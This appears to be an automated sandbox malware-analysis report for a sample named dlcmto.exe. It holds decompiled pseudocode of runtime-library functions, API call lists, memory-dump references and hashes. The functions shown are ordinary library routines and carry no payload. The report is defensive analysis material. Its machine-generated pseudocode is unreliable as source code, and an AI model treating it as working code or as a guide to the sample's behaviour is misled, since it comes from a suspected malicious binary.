							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0119C0F0();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E01191F25(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}






















































































                                          0x0119ad6a
                                          0x0119ad71
                                          0x0119ad74
                                          0x0119ad79
                                          0x0119ad81
                                          0x0119ad84
                                          0x0119ad88
                                          0x0119ad8b
                                          0x0119ad95
                                          0x0119ad9f
                                          0x0119ada1
                                          0x0119ada4
                                          0x0119ada7
                                          0x0119adad
                                          0x0119adaf
                                          0x0119adb6
                                          0x0119adc3
                                          0x0119adc4
                                          0x0119adc7
                                          0x0119adca
                                          0x0119adcb
                                          0x0119adcc
                                          0x0119adcf
                                          0x0119add4
                                          0x0119b0e0
                                          0x0119b0e0
                                          0x0119adda
                                          0x0119adda
                                          0x0119addd
                                          0x0119addf
                                          0x0119ade5
                                          0x0119ade8
                                          0x0119adef
                                          0x0119adf6
                                          0x0119adff
                                          0x00000000
                                          0x00000000
                                          0x0119ae05
                                          0x0119ae0b
                                          0x0119ae0d
                                          0x0119ae0f
                                          0x0119ae12
                                          0x0119ae17
                                          0x0119ae1b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119ae1b
                                          0x0119ae20
                                          0x0119ae23
                                          0x0119ae25
                                          0x0119ae2a
                                          0x0119aedc
                                          0x0119aedd
                                          0x0119aee0
                                          0x0119aee2
                                          0x0119b090
                                          0x0119b092
                                          0x00000000
                                          0x0119b094
                                          0x0119b094
                                          0x0119b097
                                          0x0119b09a
                                          0x0119b0a3
                                          0x0119b0a6
                                          0x0119b0a7
                                          0x0119b0ab
                                          0x0119b0ae
                                          0x0119b0ae
                                          0x00000000
                                          0x0119b0b2
                                          0x0119aee8
                                          0x0119aee8
                                          0x0119aeed
                                          0x0119aef0
                                          0x0119aef6
                                          0x0119aefc
                                          0x0119af05
                                          0x0119af08
                                          0x0119af08
                                          0x0119af09
                                          0x0119af0a
                                          0x0119af0d
                                          0x0119af0e
                                          0x00000000
                                          0x0119af0e
                                          0x0119ae30
                                          0x0119ae3f
                                          0x0119ae40
                                          0x0119ae43
                                          0x0119ae45
                                          0x0119ae4a
                                          0x0119b05b
                                          0x0119b05d
                                          0x0119b05f
                                          0x0119b062
                                          0x0119b067
                                          0x0119b070
                                          0x0119b073
                                          0x0119b074
                                          0x0119b078
                                          0x0119b07b
                                          0x0119b07e
                                          0x0119b07e
                                          0x0119b082
                                          0x0119b082
                                          0x0119b082
                                          0x0119b085
                                          0x0119b085
                                          0x0119b085
                                          0x0119b087
                                          0x0119b087
                                          0x0119b08b
                                          0x0119ae50
                                          0x0119ae50
                                          0x0119ae54
                                          0x0119ae56
                                          0x0119ae59
                                          0x0119ae5c
                                          0x0119ae60
                                          0x0119ae61
                                          0x0119ae65
                                          0x0119ae65
                                          0x0119ae68
                                          0x0119ae6d
                                          0x0119ae79
                                          0x0119ae7e
                                          0x0119ae81
                                          0x0119ae81
                                          0x0119ae86
                                          0x0119ae88
                                          0x0119ae8b
                                          0x0119ae8d
                                          0x0119ae90
                                          0x0119ae93
                                          0x0119ae96
                                          0x0119ae9e
                                          0x0119aea2
                                          0x0119aea6
                                          0x0119aea6
                                          0x0119aeac
                                          0x0119aeb2
                                          0x0119aeb5
                                          0x0119aebd
                                          0x0119aec4
                                          0x0119aec8
                                          0x0119aec9
                                          0x0119aecc
                                          0x0119aecd
                                          0x0119af11
                                          0x0119af11
                                          0x0119af15
                                          0x0119af16
                                          0x0119af1b
                                          0x0119af21
                                          0x00000000
                                          0x0119af27
                                          0x0119af2b
                                          0x0119afb4
                                          0x0119afbb
                                          0x0119afc3
                                          0x0119afcb
                                          0x0119afd0
                                          0x0119afd3
                                          0x0119afd8
                                          0x00000000
                                          0x0119afde
                                          0x0119aff3
                                          0x0119b0d7
                                          0x0119b0dd
                                          0x00000000
                                          0x0119aff9
                                          0x0119b002
                                          0x0119b004
                                          0x0119b00a
                                          0x00000000
                                          0x0119b010
                                          0x0119b014
                                          0x0119b04a
                                          0x0119b04d
                                          0x00000000
                                          0x0119b053
                                          0x0119b053
                                          0x00000000
                                          0x0119b053
                                          0x0119b016
                                          0x0119b018
                                          0x0119b01a
                                          0x0119b033
                                          0x00000000
                                          0x0119b039
                                          0x0119b03d
                                          0x00000000
                                          0x0119b043
                                          0x0119b043
                                          0x0119b046
                                          0x0119b047
                                          0x00000000
                                          0x0119b047
                                          0x0119b03d
                                          0x0119b033
                                          0x0119b014
                                          0x0119b00a
                                          0x0119aff3
                                          0x0119afd8
                                          0x0119af21
                                          0x0119ae4a
                                          0x00000000
                                          0x0119af32
                                          0x0119af32
                                          0x0119af35
                                          0x0119af39
                                          0x0119af3c
                                          0x0119af5e
                                          0x0119af61
                                          0x0119af66
                                          0x0119af6a
                                          0x0119af6e
                                          0x0119af9c
                                          0x0119af9e
                                          0x00000000
                                          0x0119af70
                                          0x0119af70
                                          0x0119af73
                                          0x0119af76
                                          0x0119af79
                                          0x0119b0b4
                                          0x0119b0b7
                                          0x0119b0ba
                                          0x0119b0c4
                                          0x0119b0cf
                                          0x0119b0d4
                                          0x00000000
                                          0x0119af7f
                                          0x0119af86
                                          0x0119af8b
                                          0x0119af8e
                                          0x0119af91
                                          0x00000000
                                          0x0119af97
                                          0x0119af97
                                          0x00000000
                                          0x0119af97
                                          0x0119af91
                                          0x0119af79
                                          0x0119af3e
                                          0x0119af42
                                          0x0119af45
                                          0x0119af4a
                                          0x0119af50
                                          0x0119af52
                                          0x0119af59
                                          0x0119af9f
                                          0x0119afa2
                                          0x0119afa3
                                          0x0119afa8
                                          0x0119afab
                                          0x0119afae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119afae
                                          0x00000000
                                          0x0119af3c
                                          0x0119addd
                                          0x0119b0e3
                                          0x0119b0e3
                                          0x0119b0e5
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0e8
                                          0x0119b0fa
                                          0x0119b0fc
                                          0x0119b0fd
                                          0x0119b0fe
                                          0x0119b108

                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 0119ADA7
                                          • __fassign.LIBCMT ref: 0119AF86
                                          • __fassign.LIBCMT ref: 0119AFA3
                                          • WriteFile.KERNEL32(?,01196CD1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0119AFEB
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0119B02B
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0119B0D7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: 421e016fb538bc3e0d866618f31269fc3a1bfa2e5daedf2b1fd32c8ffb95227d
                                          • Instruction ID: 4bab9b2299cdaeab4ceab809a90101d84d4c30cb72844d9dea71d3b53b176b20
                                          • Opcode Fuzzy Hash: 421e016fb538bc3e0d866618f31269fc3a1bfa2e5daedf2b1fd32c8ffb95227d
                                          • Instruction Fuzzy Hash: 33D1CC75D042589FCF19CFA8D8809EDBBB5FF48314F28416AE865BB341D731AA46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01194AA8 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01194AA8(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x11a7224 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0119A38C(_t13,  *0x11a7224);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0119A3C7(_t14,  *0x11a7224, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0119A30B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0119A3C7(_t18,  *0x11a7224, 0);
								} else {
									_t8 = E0119A3C7(_t18,  *0x11a7224, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E01194B56(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                          0x01194aa8
                                          0x01194aaf
                                          0x01194ac2
                                          0x01194ac9
                                          0x01194acb
                                          0x01194acf
                                          0x01194ae8
                                          0x01194ae8
                                          0x01194ad1
                                          0x01194ad3
                                          0x01194ae6
                                          0x01194aed
                                          0x01194af6
                                          0x01194af9
                                          0x01194afc
                                          0x01194b10
                                          0x01194b10
                                          0x01194b19
                                          0x01194afe
                                          0x01194b05
                                          0x01194b0b
                                          0x01194b0e
                                          0x01194b22
                                          0x01194b24
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01194b0e
                                          0x01194b27
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01194ae6
                                          0x01194ad3
                                          0x01194b2f
                                          0x01194b39
                                          0x01194ab1
                                          0x01194ab3
                                          0x01194ab3

                                          APIs
                                          • GetLastError.KERNEL32(?,?,01194A9F,01192108,01191C90), ref: 01194AB6
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01194AC4
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01194ADD
                                          • SetLastError.KERNEL32(00000000,01194A9F,01192108,01191C90), ref: 01194B2F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 59d07bc058e0dba7d65282d9e851ae6a9f2b3bf409fccab12914932279159f12
                                          • Instruction ID: bc7cb81294f33f21f57a983be35afc7445e09b8b8de65563a9a947d5b4f3c99e
                                          • Opcode Fuzzy Hash: 59d07bc058e0dba7d65282d9e851ae6a9f2b3bf409fccab12914932279159f12
                                          • Instruction Fuzzy Hash: C701F73220D2135EEF3D29797E84A2B3ED4DF15179720023AF532424D1EF629D465284
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011980CF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011980CF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E011986B8(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E011986B8(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E01196E65(GetLastError());
									_t17 =  *((intOrPtr*)(E01196E3F(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E01198094(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E01196E65(GetLastError());
						_t17 =  *((intOrPtr*)(E01196E3F(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E01198094(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E011980BB(_a8);
				return 0;
			}









                                          0x011980d5
                                          0x011980da
                                          0x011980ee
                                          0x011980f1
                                          0x01198123
                                          0x0119812b
                                          0x0119812d
                                          0x01198146
                                          0x01198149
                                          0x0119814c
                                          0x0119815a
                                          0x01198169
                                          0x01198171
                                          0x01198173
                                          0x0119818c
                                          0x0119818f
                                          0x0119818f
                                          0x01198175
                                          0x0119817c
                                          0x01198187
                                          0x01198187
                                          0x01198191
                                          0x01198192
                                          0x00000000
                                          0x01198192
                                          0x01198151
                                          0x01198156
                                          0x01198158
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01198158
                                          0x01198136
                                          0x01198141
                                          0x00000000
                                          0x01198141
                                          0x011980f3
                                          0x011980f6
                                          0x011980f9
                                          0x0119810c
                                          0x0119810f
                                          0x01198111
                                          0x01198113
                                          0x00000000
                                          0x01198113
                                          0x011980ff
                                          0x01198104
                                          0x01198106
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01198106
                                          0x011980df
                                          0x00000000

                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\dlcmto.exe, xrefs: 011980D4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\dlcmto.exe
                                          • API String ID: 0-1922560230
                                          • Opcode ID: a11b9126a4c63e6021ebf7c9d72dd3ebee4766fe5d3f2f2f6239d404bfe84a39
                                          • Instruction ID: 04a4bf0d11a426a5012b0f8fe92797d7f6eb31edc00057040b2aef147191e664
                                          • Opcode Fuzzy Hash: a11b9126a4c63e6021ebf7c9d72dd3ebee4766fe5d3f2f2f6239d404bfe84a39
                                          • Instruction Fuzzy Hash: 7B21A1B120421EAFDF2DAF79DC80C6B77ADAF422687058534F63997141EB31EC4187A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01192CE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E01192CE1(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x11aa000(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                          0x01192ce7
                                          0x01192ceb
                                          0x01192cf6
                                          0x01192cfe
                                          0x01192d09
                                          0x01192d0f
                                          0x01192d13
                                          0x01192d1a
                                          0x01192d20
                                          0x01192d20
                                          0x01192d22
                                          0x01192d27
                                          0x00000000
                                          0x01192d2c
                                          0x01192d33

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01192D6B,?,?,01192DEC,?,?,?), ref: 01192CF6
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01192D09
                                          • FreeLibrary.KERNEL32(00000000,?,?,01192D6B,?,?,01192DEC,?,?,?), ref: 01192D2C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 12fa0ac9452b68840c763ba730d432681b5bba0a32e3ab42dba2d13ff8ff293a
                                          • Instruction ID: 50df7cafa45a85243434ee9e612e654c812a323f9744c7415d9c90655721f116
                                          • Opcode Fuzzy Hash: 12fa0ac9452b68840c763ba730d432681b5bba0a32e3ab42dba2d13ff8ff293a
                                          • Instruction Fuzzy Hash: A0F0A031A40218FBDF2A9B55ED0DBAD7EB9EF00766F900064F915A2050CB709F40DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01196FFA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01196FFA(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x11a7908; // 0x11a7958
					if(_t23 != 0) {
						E011963FE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x11a790c; // 0x11a96a0
					if(_t24 != 0) {
						E011963FE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x11a7910; // 0x11a96a0
					if(_t25 != 0) {
						E011963FE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x11a7938; // 0x11a795c
					if(_t26 != 0) {
						E011963FE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x11a793c; // 0x11a96a4
					if(_t27 != 0) {
						return E011963FE(_t6);
					}
				}
				return _t6;
			}










                                          0x01197000
                                          0x01197005
                                          0x01197009
                                          0x0119700f
                                          0x01197012
                                          0x01197017
                                          0x0119701b
                                          0x01197021
                                          0x01197024
                                          0x01197029
                                          0x0119702d
                                          0x01197033
                                          0x01197036
                                          0x0119703b
                                          0x0119703f
                                          0x01197045
                                          0x01197048
                                          0x0119704d
                                          0x0119704e
                                          0x01197051
                                          0x01197057
                                          0x00000000
                                          0x0119705f
                                          0x01197057
                                          0x01197062

                                          APIs
                                          • _free.LIBCMT ref: 01197012
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01197024
                                          • _free.LIBCMT ref: 01197036
                                          • _free.LIBCMT ref: 01197048
                                          • _free.LIBCMT ref: 0119705A
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: f4637ee0e52fb5a597b04303a6f0d913902d204fb8fa73c74acba05f6c7a0e73
                                          • Instruction ID: 3931f9d4fb07aacdef6390e39aec7bcb93ea5ed302b9801776fc42dc45cefd85
                                          • Opcode Fuzzy Hash: f4637ee0e52fb5a597b04303a6f0d913902d204fb8fa73c74acba05f6c7a0e73
                                          • Instruction Fuzzy Hash: 0DF04F36619204B7AB3CEA5CE581D067BD9EE15620BA8081AE178D75C4DB31FA908AB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119A44C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119A44C(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E0119724E(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                          0x0119a459
                                          0x0119a461
                                          0x0119a496
                                          0x0119a463
                                          0x0119a46c
                                          0x00000000
                                          0x0119a493
                                          0x0119a492
                                          0x0119a492

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0119A4E8,00000000,?,011A920C,?,?,?,0119A41F,00000004,InitializeCriticalSectionEx,011A106C,011A1074), ref: 0119A459
                                          • GetLastError.KERNEL32(?,0119A4E8,00000000,?,011A920C,?,?,?,0119A41F,00000004,InitializeCriticalSectionEx,011A106C,011A1074,00000000,?,01194BE1), ref: 0119A463
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0119A48B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: f1dd76f936f8b82e70e743d7bcfa0047e48bc799eebc165b1c100785fd7268d2
                                          • Instruction ID: f4f347f1c556df1968fe2bcfba1ae3ac3047a39760b4750e5075383c9620cbc4
                                          • Opcode Fuzzy Hash: f1dd76f936f8b82e70e743d7bcfa0047e48bc799eebc165b1c100785fd7268d2
                                          • Instruction Fuzzy Hash: 89E0DF30784305BBEF3A1F60FC0AB193E19AF00F40F644034FA2DAD4D1D7A2E5648A85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011977C1 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E011977C1(void* __ebx, signed int* _a4, intOrPtr* _a8) {
				signed int* _v0;
				signed int _v10;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v72;
				void* __esi;
				intOrPtr* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				intOrPtr* _t98;
				signed int _t100;
				intOrPtr _t101;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				signed int* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t152;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t158;
				signed int _t161;
				intOrPtr _t163;
				signed int* _t164;
				signed int* _t167;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;

				_pop(_t179);
				_t180 = _t182;
				_t79 = _a8;
				_t183 = _t182 - 0x28;
				_t187 = _t79;
				if(_t79 != 0) {
					_t167 = _v0;
					_t128 = 0;
					 *_t79 = 0;
					_t161 = 0;
					_t80 =  *_t167;
					_t131 = 0;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0;
					__eflags = _t80;
					if(_t80 == 0) {
						L10:
						_v12 = _t128;
						_t82 = _t131 - _t161;
						_t168 = _t161;
						_v16 = _t168;
						_t151 = (_t82 >> 2) + 1;
						_t84 = _t82 + 3 >> 2;
						__eflags = _t131 - _t168;
						_v20 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t170 =  !_t168 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t170;
						if(_t170 != 0) {
							_t117 = _t161;
							_t158 = _t128;
							do {
								_t144 =  *_t117;
								_t20 = _t144 + 1; // 0x1
								_v24 = _t20;
								do {
									_t119 =  *_t144;
									_t144 = _t144 + 1;
									__eflags = _t119;
								} while (_t119 != 0);
								_t128 = _t128 + 1 + _t144 - _v24;
								_t117 = _v16 + 4;
								_t158 = _t158 + 1;
								_v16 = _t117;
								__eflags = _t158 - _t170;
							} while (_t158 != _t170);
							_t151 = _v20;
							_v12 = _t128;
							_t128 = 0;
							__eflags = 0;
						}
						_t171 = E01193043(_t84, _t151, _v12, 1);
						_t184 = _t183 + 0xc;
						__eflags = _t171;
						if(_t171 != 0) {
							_v16 = _t161;
							_t87 = _t171 + _v20 * 4;
							_t132 = _t87;
							_v32 = _t87;
							_t88 = _t161;
							_v20 = _t87;
							__eflags = _t88 - _v44;
							if(_t88 == _v44) {
								L25:
								_v16 = _t128;
								 *_a4 = _t171;
								_t172 = _t128;
								goto L26;
							} else {
								_t154 = _t171 - _t161;
								__eflags = _t154;
								_v36 = _t154;
								do {
									_t98 =  *_t88;
									_t155 = _t98;
									_v28 = _t98;
									_v24 = _t155 + 1;
									do {
										_t100 =  *_t155;
										_t155 = _t155 + 1;
										__eflags = _t100;
									} while (_t100 != 0);
									_t101 = _t155 - _v24 + 1;
									_push(_t101);
									_v24 = _t101;
									_t105 = E0119BAB9(_t132, _v32 - _t132 + _v12, _v28);
									_t184 = _t184 + 0x10;
									__eflags = _t105;
									if(_t105 != 0) {
										_push(_t128);
										_push(_t128);
